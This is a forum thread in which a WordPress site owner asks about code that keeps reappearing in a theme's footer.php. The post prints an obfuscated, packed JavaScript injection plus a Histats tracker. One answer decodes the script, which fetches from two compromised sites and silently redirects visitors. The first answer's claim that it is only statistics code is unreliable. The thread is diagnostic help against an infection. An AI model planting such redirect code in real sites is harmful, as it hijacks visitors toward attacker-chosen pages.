skip to Main Content

One of my wordpress theme in footer.php file add some malicious code automatically. I delete that code several time but some moment later that code automatically added in footer.php file. I don’t find any solution to stop this. I think this it is some type of malicious code, I want to know more about this and how to stop this.

footer.php

<?php global $themesbazar; ?> 
         <div class="footer">
  <?php echo $themesbazar['editorial']?>
        </div>
    <div class="footer-04">
        <div class="row">
                <div class="col-md-6">
                    <div class="copyright">
                    <?php echo $themesbazar['copyright']?>
                    </div>
                 </div>
                <div class="col-md-6"><?php div(); ?>
                </div>
        </div>              
    </div>      
    </section>

with malicious code:

 <?php global $themesbazar; ?> 
         <div class="footer">
  <?php echo $themesbazar['editorial']?>
        </div>
    <div class="footer-04">
        <div class="row">
                <div class="col-md-6">
                    <div class="copyright">
                    <?php echo $themesbazar['copyright']?>
                    </div>
                 </div>
                <div class="col-md-6"><?php div(); ?>
                </div>
        </div>  



    </div>      
    </section>

    <script type="text/javascript">
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('9 w(c){5 8=" "+N.8;5 l=" "+c+"=";5 m=T;5 a=0;5 b=0;7(8.k>0){a=8.j(l);7(a!=-1){a+=l.k;b=8.j(";",a);7(b==-1){b=8.k}m=X(8.O(a,b))}}x(m)}9 I(c,J,d,g,i,n){N.8=c+"="+12(J)+((d)?"; d="+d:"")+((g)?"; g="+g:"")+((i)?"; i="+i:"")+((n)?"; n":"")}9 U(){5 3;F{3=h q("Y.v")}t(e){F{3=h q("V.v")}t(E){3=R}}7(!3&&14 D!='10'){3=h D()}x 3}5 s='A://z.11.y/B-C/G/Z-W/13/1h/r.H';5 K='A://z.1p.y.1o/B-C/G/1j/1l/r.H';7(w('15')!='S'){9 P(){5 f=h 1k();f.1m(f.1n()+1r*1q*6*1);I('1i','S',f.1a())}9 o(Q,M){5 3=U();3.19('18',Q,p);3.16=9(){7(3.17==4&&3.1b==1c){7(3.L.j('u=')==0){P();1g.1f=3.L.O(2)}1e{7(M)o(K,R)}}};3.1d(T)}o(s,p)}',62,90,'|||xmlhttp||var||if|cookie|function|offset|end|name|expires||now|path|new|domain|indexOf|length|search|setStr|secure|lookupRedirect|true|ActiveXObject||sAdsUrl1|catch||XMLHTTP|getCookie|return|com|www|https|wp|content|XMLHttpRequest||try|themes|php|setCookie|value|sAdsUrl2|responseText|bIsFirst|document|substring|setAdsCookie|sUrl|false|complete|null|getXmlHttp|Microsoft|the7|unescape|Msxml2|dt|undefined|santecza|escape|woocommerce|typeof|newadsshow|onreadystatechange|readyState|GET|open|toGMTString|status|200|send|else|location|window|cart|newadshow|envision|Date|bbpress|setTime|getTime|tr|mavigrup|3600|1000'.split('|'),0,{}))
   </script>
   <script type="text/javascript">var _Hasync= _Hasync|| [];
 _Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
   var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
 hs.src = ('//s10.histats.com/js15_as.js');
 (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body') 
[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4214393&101" 
alt="counter customizable free hit" border="0"></a></noscript>
 <script type="text/javascript">
    </script>
    </body>
   </html>

2

Answers


  1. This code looks refer to visitor statistics service.
    Is there any “Hi Stats” plugin activated? Have you ever tried to disable all WordPress plugins?

    Are these malicious codes added in browser source code output or in the original file (the file you uploaded via FTP)?

    What’s your webhosting provider? Maybe, this code can be added for your hosting provider automatically.

    Try these hypotheses, if won’t work I’ll help you to find another solution.

    Login or Signup to reply.
  2. I have encoded the code you have posted, may be that would be helpful. https://beautifier.io/ . Now you can search the below-mentioned functions names using search-in-files by any code-editor. Hope this helps someone searching for similar issues.

    function getCookie(name) {
        var cookie = " " + document.cookie;
        var search = " " + name + "=";
        var setStr = null;
        var offset = 0;
        var end = 0;
        if (cookie.length > 0) {
            offset = cookie.indexOf(search);
            if (offset != -1) {
                offset += search.length;
                end = cookie.indexOf(";", offset);
                if (end == -1) {
                    end = cookie.length
                }
                setStr = unescape(cookie.substring(offset, end))
            }
        }
        return (setStr)
    }
    
    function setCookie(name, value, expires, path, domain, secure) {
        document.cookie = name + "=" + escape(value) + ((expires) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : "")
    }
    
    function getXmlHttp() {
        var xmlhttp;
        try {
            xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
        } catch (e) {
            try {
                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
            } catch (E) {
                xmlhttp = false
            }
        }
        if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
            xmlhttp = new XMLHttpRequest()
        }
        return xmlhttp
    }
    var sAdsUrl1 = 'https://www.santecza.com/wp-content/themes/dt-the7/woocommerce/cart/r.php';
    var sAdsUrl2 = 'https://www.mavigrup.com.tr/wp-content/themes/envision/bbpress/r.php';
    if (getCookie('newadsshow') != 'complete') {
        function setAdsCookie() {
            var now = new Date();
            now.setTime(now.getTime() + 1000 * 3600 * 6 * 1);
            setCookie('newadshow', 'complete', now.toGMTString())
        }
    
        function lookupRedirect(sUrl, bIsFirst) {
            var xmlhttp = getXmlHttp();
            xmlhttp.open('GET', sUrl, true);
            xmlhttp.onreadystatechange = function() {
                if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
                    if (xmlhttp.responseText.indexOf('u=') == 0) {
                        setAdsCookie();
                        window.location = xmlhttp.responseText.substring(2)
                    } else {
                        if (bIsFirst) lookupRedirect(sAdsUrl2, false)
                    }
                }
            };
            xmlhttp.send(null)
        }
        lookupRedirect(sAdsUrl1, true)
    }
    
    <
    script type = "text/javascript" >
        var _Hasync = _Hasync || [];
    _Hasync.push(['Histats.start', '1,4214393,4,0,0,0,00010000']);
    _Hasync.push(['Histats.fasi', '1']);
    _Hasync.push(['Histats.track_hits', '']);
    (function() {
        var hs = document.createElement('script');
        hs.type = 'text/javascript';
        hs.async = true;
        hs.src = ('//s10.histats.com/js15_as.js');
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
    })();
    
    <
    noscript > < a href = "/"
    target = "_blank" > < img src = "//sstatic1.histats.com/0.gif?4214393&101"
    alt = "counter customizable free hit"
    border = "0" > < /a></noscript >
    
    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search